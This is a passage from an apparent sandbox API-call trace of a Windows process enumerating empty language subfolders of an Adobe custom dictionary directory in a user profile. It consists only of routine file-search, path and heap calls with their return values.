lpMsg=0x39cfb74) returned 0 [0207.317] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brt\\") returned="brt\\" [0207.317] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0207.317] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0207.317] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0207.317] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0207.317] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0207.317] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0207.317] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0207.317] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0207.317] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0207.317] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0207.317] PathFindFileNameW (pszPath="") returned="" [0207.317] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brt\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeab70f70, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeab70f70, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeab70f70, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0207.318] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67d28 | out: hHeap=0x2c0000) returned 1 [0207.318] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeab70f70, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeab70f70, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeab70f70, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.318] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeab70f70, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeab70f70, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeab70f70, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0207.318] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0207.318] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b87718 | out: hHeap=0x2c0000) returned 1 [0207.318] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67248 | out: hHeap=0x2c0000) returned 1 [0207.318] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0207.318] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0207.318] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brz\\") returned="brz\\" [0207.318] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0207.318] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0207.318] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0207.318] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0207.319] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0207.319] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0207.319] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0207.319] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0207.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0207.319] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0207.319] PathFindFileNameW (pszPath="") returned="" [0207.319] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brz\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec6bf330, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0207.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67d28 | out: hHeap=0x2c0000) returned 1 [0207.320] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec6bf330, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.320] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec6bf330, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0207.320] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0207.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b87718 | out: hHeap=0x2c0000) returned 1 [0207.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67248 | out: hHeap=0x2c0000) returned 1 [0207.320] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0207.320] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0207.320] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan\\") returned="dan\\" [0207.320] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0207.320] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0207.320] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0207.320] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0207.320] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0207.320] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0207.320] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0207.320] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0207.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0207.320] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0207.321] PathFindFileNameW (pszPath="") returned="" [0207.321] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4758f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb4758f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb4758f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0207.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67d28 | out: hHeap=0x2c0000) returned 1 [0207.321] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4758f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb4758f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb4758f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.321] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4758f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb4758f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb4758f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0207.321] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0207.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b87718 | out: hHeap=0x2c0000) returned 1 [0207.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67248 | out: hHeap=0x2c0000) returned 1 [0207.321] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0207.321] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0207.321] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut\\") returned="dut\\" [0207.321] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0207.321] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0207.321] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0207.321] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0207.321] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0207.321] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0207.322] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0207.322] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0207.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0207.322] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0207.322] PathFindFileNameW (pszPath="") returned="" [0207.322] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xebdabf50, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xebdabf50, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xebdabf50, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0207.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67d28 | out: hHeap=0x2c0000) returned 1 [0207.323] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xebdabf50, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xebdabf50, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xebdabf50, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.323] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xebdabf50, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xebdabf50, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xebdabf50, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0207.323] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0207.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b87718 | out: hHeap=0x2c0000) returned 1 [0207.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67248 | out: hHeap=0x2c0000) returned 1 [0207.323] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0207.323] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0207.323] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng\\") returned="eng\\" [0207.323] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0207.323] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0207.323] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0207.323] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0207.323] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0207.323] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0207.323] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0207.323] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0207.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0207.323] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0207.323] PathFindFileNameW (pszPath="") returned="" [0207.323] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9487bb0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9487bb0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9487bb0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0207.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67d28 | out: hHeap=0x2c0000) returned 1 [0207.324] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9487bb0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9487bb0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9487bb0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.324] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9487bb0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9487bb0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9487bb0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0207.324] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0207.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b87718 | out: hHeap=0x2c0000) returned 1 [0207.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67248 | out: hHeap=0x2c0000) returned 1 [0207.324] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0207.324] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0207.324] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\frn\\") returned="frn\\" [0207.324] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0207.324] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0207.324] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0207.324] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0207.324] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0207.324] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0207.324] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0207.324] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0207.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0207.324] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0207.324] PathFindFileNameW (pszPath="") returned="" [0207.325] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\frn\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9d9af90, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9d9af90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9d9af90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0207.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67d28 | out: hHeap=0x2c0000) returned 1 [0207.325] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9d9af90, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9d9af90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9d9af90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.325] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9d9af90, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9d9af90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9d9af90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0207.325] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0207.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b87718 | out: hHeap=0x2c0000) returned 1 [0207.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67248 | out: hHeap=0x2c0000) returned 1 [0207.325] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0207.325] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0207.325] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\grm\\") returned="grm\\" [0207.325] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0207.325] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0207.325] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0207.325] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0207.325] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0207.325] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0207.325] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0207.326] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0207.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 